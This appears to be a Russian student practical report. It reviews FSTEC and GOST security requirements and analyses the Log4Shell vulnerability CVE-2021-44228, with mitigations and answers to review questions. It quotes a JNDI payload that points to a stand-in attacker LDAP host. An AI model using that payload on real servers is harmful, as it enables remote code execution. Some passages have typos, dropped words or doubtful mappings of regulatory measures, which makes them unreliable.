- Область применения: Защита от несанкционированного доступа к информации в автоматизированных системах и вычислительной технике.
- Количество классов защищённости: 3 класса. Класс 1 – для АС, обрабатывающих информацию особой важности, класс 2 – секретную информацию, класс 3 – конфиденциальную информацию.
- Что регулирует: Требования к идентификации и аутентификации пользователей, разграничению доступа к ресурсам, контролю доступа на основе мандатной и дискреционной политик, регистрации событий безопасности.
- Кому адресован: Государственным органам и операторам государственных информационных систем.
- Группа мер УПД включает:
- УПД.1 – Управление правами доступа субъектов доступа к объектам доступа.
- УПД.2 – Ограничение прав доступа субъектов доступа к объектам доступа на основе ролевой модели.
- УПД.3 – Ограничение прав на запуск программ и выполнение действий.
- УПД.4 – Контроль полномочий субъектов доступа.
CVE-идентификатор: CVE-2021-44228
CVSS Score: 10.0 Критический
Затронутый продукт: Apache Log4j 2.x версии 2.0 – 2.14.1
Уязвимость Log4Shell позволяет злоумышленнику выполнить произвольный код на сервере через передачу специально сформированной строки в лог. Библиотека Log4j, используя JNDI, обращается к внешнему LDAP-серверу под контролем атакующего и загружает вредоносный Java-класс.
- Злоумышленник отправляет запрос с payload’ом
${jndi:ldap://злоумышленник.com/exploit}. - Log4j логирует строку и выполняет JNDI-запрос к указанному LDAP-серверу.
- LDAP-сервер возвращает ссылку на удалённый Java-класс.
- Уязвимое приложение загружает и выполняет этот класс, получая полный контроль над системой.
Attack Vector: Сетевой
Privileges Required: Нет
Ущерб:
- Конфиденциальность – полная утечка данных.
- Целостность – возможность модификации данных и установки вредоносного ПО.
- Доступность – потенциальный вывод системы из строя.
| Группа мер | Мера | Как помогает |
|---|---|---|
| ЗИС | ЗИС.7 – Контроль входных данных | Предотвращает передачу опасных JNDI-выражений в логгер. |
| ОПС | ОПС.2 – Управление уязвимостями | Установка патча устраняет уязвимость. |
| ОЦЛ | ОЦЛ.3 – Контроль изменений ПО и конфигураций | Позволяет обнаружить несанкционированную загрузку классов. |
| ИАФ | ИАФ.4 – Защита от подбора учётных данных | Ограничивает атаки, требующие аутентификации. |
В ходе работы изучены тдокументы в области информационной безопасности: ГОСТ Р 50739-95 и Приказ ФСТЭК №17. Выполнен анализ реальной критической уязвимости Log4Shell. Показано, что даже уязвимость с максимальным CVSS-баллом 10.0 может быть предотвращена, предусмотренных нормативными документами – своевременное обновление ПО, контроль входных данных, управление доступом. Скорость реагирования на угрозу и соблюдение регламентов являются ключевыми факторами защиты. Практическая работа демонстрирует необходимость постоянного мониторинга CVE и согласования принятых мер с актуальными требованиями ФСТЭК.
1. Что такое CVSS и какие оценки считаются критическими?
CVSS – международный стандарт для оценки уязвимостей. Критическими считаются оценки от 9.0 до 10.0.
2. Чем отличаются Приказ ФСТЭК №17 и №21? На какие системы они распространяются?
Приказ №17 устанавливает требования к защите информации в гос;ИС. Приказ №21 определяет требования к защите персональных данных в информационных системах персональных данных. Различия: в разных объектах регулирования, уровнях защищённости, перечьне мер.
3. Что такое «вектор атаки» в описании CVE? Какие значения он может принимать?
Вектор атаки – характеристика CVSS из которого злоумышленник может использовать уязвимость.
4. Почему уязвимость с CVSS 10.0 не обязательно является наиболее срочной для исправления в конкретной организации?
Потому что реальный риск зависит от наличия уязвимого компонента в инфраструктуре организации, возможности эксплуатации в конкретных условиях, наличия компенсирующих мер, доступности патча и времени простоя. Приоритет определяется сочетанием CVSS, контекста эксплуатации и бизнес-критичности системы.
5. Какая группа мер ФСТЭК отвечает за обновление и патчинг программного обеспечения?
Группа ОПС – конкретно мера ОПС.2 «Управление уязвимостями» и ОПС.4 «Обновление программного обеспечения».